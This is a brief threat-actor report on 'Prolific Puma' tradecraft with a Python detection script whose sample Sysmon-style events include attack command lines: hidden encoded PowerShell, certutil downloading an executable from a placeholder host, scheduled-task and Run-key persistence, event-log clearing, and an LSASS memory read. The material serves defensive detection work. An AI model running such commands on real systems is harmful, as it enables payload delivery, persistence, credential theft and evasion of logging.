Prolific Puma Threat Actor Report

Overview
Prolific Puma is a threat actor designation typically applied to a group that uses persistent and stealthy methods to compromise targeted systems. While less widely reported than other APTs, Prolific Puma has demonstrated capabilities in credential theft, privilege escalation, and lateral movement across enterprise environments.
Observed Tactics and Techniques
Initial Access and Persistence
Prolific Puma typically gains initial access via phishing emails containing malicious attachments or links, followed by the deployment of living-off-the-land binaries (LOLBins) such as PowerShell or certutil. Persistence is maintained through registry modifications, scheduled tasks, and abuse of RDP credentials.
Credential Access and Lateral Movement
After establishing a foothold, the actor dumps credentials from LSASS using tools such as Mimikatz or stealthier methods such as direct memory reads. The actor then moves laterally with valid administrator credentials over RDP and WMI, often disabling logging or tampering with EDR systems along the way.
Detection and Mitigation
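A detection pass over constructed Sysmon-style telemetry for the tradecraft described above (LOLBin execution, scheduled-task and Run-key persistence, LSASS memory reads, log clearing), written as an added example for this report rather than taken from the page or any vendor. The event schema, the ATT&CK labels in the rule names, the sample events and the LSASS allowlist are assumptions chosen for illustration.

```python
import re
from dataclasses import dataclass
PROCESS_VM_READ = 0x0010  # access right a process needs to read another process's memory
OFFICE = {"outlook.exe", "winword.exe", "excel.exe"}
LSASS_ALLOW = {"svchost.exe", "csrss.exe", "msmpeng.exe"}  # tuning allowlist, assumed benign

@dataclass
class Event:
    """Minimal Sysmon-style record: EID 1 = process create, EID 10 = process access."""
    eid: int
    image: str = ""      # created process (EID 1) or source process (EID 10)
    parent: str = ""     # parent image (EID 1)
    cmd: str = ""        # command line (EID 1)
    target: str = ""     # accessed process (EID 10)
    granted: int = 0     # GrantedAccess mask (EID 10)

def proc(path):
    return path.lower().rsplit("\\", 1)[-1]  # file name only, case-folded

def created(e, image, pattern):  # EID 1 event creating `image` with a command line matching `pattern`
    return e.eid == 1 and proc(e.image) == image and bool(re.search(pattern, e.cmd, re.I))

# (ATT&CK technique and description, predicate); each rule covers one item of the reported tradecraft.
RULES = [
    ("T1566/T1059.001 Office app spawning encoded PowerShell", lambda e:
        created(e, "powershell.exe", r"\s-(e|enc|encodedcommand)\b") and proc(e.parent) in OFFICE),
    ("T1105 certutil fetching or decoding a payload", lambda e: created(e, "certutil.exe", r"-urlcache|-decode")),
    ("T1053.005 scheduled task created", lambda e: created(e, "schtasks.exe", r"/create")),
    ("T1547.001 Run key modified", lambda e: created(e, "reg.exe", r"currentversion\\run")),
    ("T1070.001 Windows event log cleared", lambda e: created(e, "wevtutil.exe", r"\bcl\b")),
    ("T1003.001 non-allowlisted process reading LSASS memory", lambda e: e.eid == 10
        and proc(e.target) == "lsass.exe" and bool(e.granted & PROCESS_VM_READ) and proc(e.image) not in LSASS_ALLOW),
]

def detect(events):  # returns (rule name, event) pairs for every event that matches a rule
    return [(name, e) for e in events for name, pred in RULES if pred(e)]

# Constructed sample telemetry (not real logs): one hit per rule plus one benign LSASS access.
EVENTS = [
    Event(1, "powershell.exe", "OUTLOOK.EXE", "powershell.exe -nop -w hidden -enc <BASE64_PLACEHOLDER>"),
    Event(1, "certutil.exe", "cmd.exe", "certutil.exe -urlcache -split -f http://placeholder.invalid/f a.exe"),
    Event(1, "schtasks.exe", "cmd.exe", "schtasks.exe /create /sc onlogon /tn Updater /tr C:\\Users\\Public\\a.exe"),
    Event(1, "reg.exe", "cmd.exe", "reg.exe add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v a /d C:\\Users\\Public\\a.exe"),
    Event(1, "wevtutil.exe", "cmd.exe", "wevtutil.exe cl Security"),
    Event(10, "C:\\Users\\Public\\a.exe", target="C:\\Windows\\System32\\lsass.exe", granted=0x1010),
    Event(10, "C:\\Windows\\System32\\svchost.exe", target="C:\\Windows\\System32\\lsass.exe", granted=0x1000),
]

for name, e in detect(EVENTS):
    print(f"[{name}] {e.cmd or e.image}")
```

The svchost.exe access is deliberately left unflagged: its mask lacks PROCESS_VM_READ and the image is allowlisted, which is the distinction that keeps an LSASS rule from paging on every benign handle open.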
References